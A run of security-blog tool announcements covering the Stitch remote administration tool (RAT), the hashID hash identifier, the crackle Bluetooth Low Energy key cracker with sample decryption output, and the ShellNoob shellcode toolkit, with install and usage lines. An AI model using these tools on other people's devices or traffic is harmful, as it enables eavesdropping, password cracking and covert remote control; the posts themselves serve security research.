All communication between the host and target is AES encrypted. Every Stitch program generates an AES key which is then put into all payloads. To access a payload the AES keys must match. To connect from a different system running Stitch you must add the key by using the showkey command from the original system and the addkey command on the new system.

Requirements

The only base requirement is Python 2.7. For easy installation run the following command that corresponds to your OS:

# for Windows
pip install -r win_requirements.txt

# for Mac OSX
pip install -r osx_requirements.txt

# for Linux
pip install -r lnx_requirements.txt

You can download Stitch here:

Stitch-master.zip

Or read more here.

The post Stitch – Python Remote Administration Tool AKA RAT appeared first on Darknet - The Darkside.

hashID is a tool to help you identify different types of hashes used to encrypt data, especially passwords. It’s written in Python 3 and supports the identification of over 220 unique hash types using regular expressions.

hashID is able to identify a single hash, parse a file or read multiple files in a directory and identify the hashes within them. hashID is also capable of including the corresponding hashcat mode and/or JohnTheRipper format in its output.

There are other similar tools like hash-identifier, which is outdated and this claims to replace. And the original HashTag – Password Hash Type Identification (Identify Hashes) – which is even older.

And to be fair, this hasn’t been updated since 2015 either so yah.

Usage

$ ./hashid.py [-h] [-e] [-m] [-j] [-o FILE] [--version] INPUT

-e, --extended	list all hash algorithms including salted passwords
-m, --mode	show corresponding hashcat mode in output
-j, --john	show corresponding JohnTheRipper format in output
-o FILE, --outfile FILE	write output to file (default: STDOUT)
--help	show help message and exit
--version	show program's version number and exit

Installation

You can install, upgrade, uninstall hashID with these commands:

$ pip install hashid
$ pip install --upgrade hashid
$ pip uninstall hashid

Or you can install by cloning the repository:

$ sudo apt-get install python3 git
$ git clone https://github.com/psypanda/hashid.git
$ cd hashid
$ sudo install -g 0 -o 0 -m 0644 doc/man/hashid.7 /usr/share/man/man7/
$ sudo gzip /usr/share/man/man7/hashid.7

You can download hashID here:

hashID-v3.1.4.zip

Or read more here.

The post hashID – Identify Different Types of Hashes appeared first on Darknet - The Darkside.

crackle is a tool to crack Bluetooth Smart Encryption (BLE), it exploits a flaw in the pairing mechanism that leaves all communications vulnerable to decryption by passive eavesdroppers.

crackle can guess or very quickly brute force the TK (temporary key) used in the pairing modes supported by most devices (Just Works and 6-digit PIN). With this TK, crackle can derive all further keys used during the encrypted session that immediately follows pairing.

The LTK (long-term key) is typically exchanged in this encrypted session, and it is the key used to encrypt all future communications between the master and slave. The net result: a passive eavesdropper can decrypt everything. Bluetooth Smart encryption is worthless.

Modes of Operation

Crack TK

This is the default mode used when providing crackle with an input file using -i.

In Crack TK mode, crackle brute forces the TK used during a BLE pairing event. crackle exploits the fact that the TK in Just Works(tm) and 6-digit PIN is a value in the range [0,999999] padded to 128 bits.

Decrypt with LTK

In Decrypt with LTK mode, crackle uses a user-supplied LTK to decrypt communications between a master and slave. This mode is identical to the decryption portion of Crack TK mode.

Usage

# crack TK mode
$ crackle -i <file.pcap> -o <decrypted.pcap>
TK found: 412741
LTK found: 26db138f0cc63a12dd596228577c4730
Done, processed 306 total packets, decrypted 17

# decrypting future communications with the above LTK
$ crackle -i <file.pcap> -o <decrypted.pcap> -l 26db138f0cc63a12dd596228577c4730
Done, processed 373 total packets, decrypted 15

You can download crackle here:

crackle-0.1.zip

Or read more here.

The post crackle – Crack Bluetooth Smart Encryption (BLE) appeared first on Darknet - The Darkside.

ShellNoob is a Python-based Shellcode writing toolkit which removes the boring and error-prone manual parts from creating your own shellcodes.

Do note this is not a shellcode generator or intended to replace Metasploit’s shellcode generator, it’s designed to automate the manual parts of shellcode creation like format conversion, compilation and testing, dealing with syscalls and constants and so on.

Features

• Convert shellcode between different formats and sources. Formats currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty, safeasm, completec, shellstorm.
• Interactive asm-to-opcode conversion (and viceversa) mode. This is useful when you cannot use specific bytes in the shellcode.
• Support for both ATT & Intel syntax. Check the –intel switch.
• Support for 32 and 64 bits (when playing on x86_64 machine). Check the –64 switch.
• Resolve syscall numbers, constants, and error numbers (now implemented for real! :-)).
• Portable and easily deployable (it only relies on gcc/as/objdump and python).
• It is just one self-contained python script, and it supports both Python2.7+ and Python3+.
• In-place development: you run ShellNoob directly on the target architecture!
• Built-in support for Linux/x86, Linux/x86_64, Linux/ARM, FreeBSD/x86, FreeBSD/x86_64.
• “Prepend breakpoint” option. Check the -c switch.
• Read from stdin / write to stdout support (use “-” as filename)
• Uber cheap debugging: check the –to-strace and –to-gdb option!
• Use ShellNoob as a Python module in your scripts! Check the “ShellNoob as a library” section.
• Verbose mode shows the low-level steps of the conversion: useful to debug / understand / learn!
• Extra plugins: binary patching made easy with the –file-patch, –vm-patch, –fork-nopper options! (all details below)

Usage

$ ./shellnoob.py -h
shellnoob.py [--from-INPUT] (input_file_path | - ) [--to-OUTPUT] [output_file_path | - ]
shellnoob.py -c (prepend a breakpoint (Warning: only few platforms/OS are supported!)
shellnoob.py --64 (64 bits mode, default: 32 bits)
shellnoob.py --intel (intel syntax mode, default: att)
shellnoob.py -q (quite mode)
shellnoob.py -v (or -vv, -vvv)
shellnoob.py --to-strace (compiles it & run strace)
shellnoob.py --to-gdb (compiles it & run gdb & set breakpoint on entrypoint)

Standalone "plugins"
shellnoob.py -i [--to-asm | --to-opcode ] (for interactive mode)
shellnoob.py --get-const <const>
shellnoob.py --get-sysnum <sysnum>
shellnoob.py --get-errno <errno>
shellnoob.py --file-patch <exe_fp> <file_offset> <data> (in hex). (Warning: tested only on x86/x86_64)
shellnoob.py --vm-patch <exe_fp> <vm_address> <data> (in hex). (Warning: tested only on x86/x86_64)
shellnoob.py --fork-nopper <exe_fp> (this nops out the calls to fork(). Warning: tested only on x86/x86_64)

"Installation"
shellnoob.py --install [--force] (this just copies the script in a convinient position)
shellnoob.py --uninstall [--force]

Supported INPUT format: asm, obj, bin, hex, c, shellstorm
Supported OUTPUT format: asm, obj, exe, bin, hex, c, completec, python, bash, ruby, pretty, safeasm
All combinations from INPUT to OUTPUT are supported!

You can download ShellNoob here:

shellnoob-v2.1.zip

Or read more here.

The post ShellNoob – Shellcode Writing Toolkit appeared first on Darknet - The Darkside.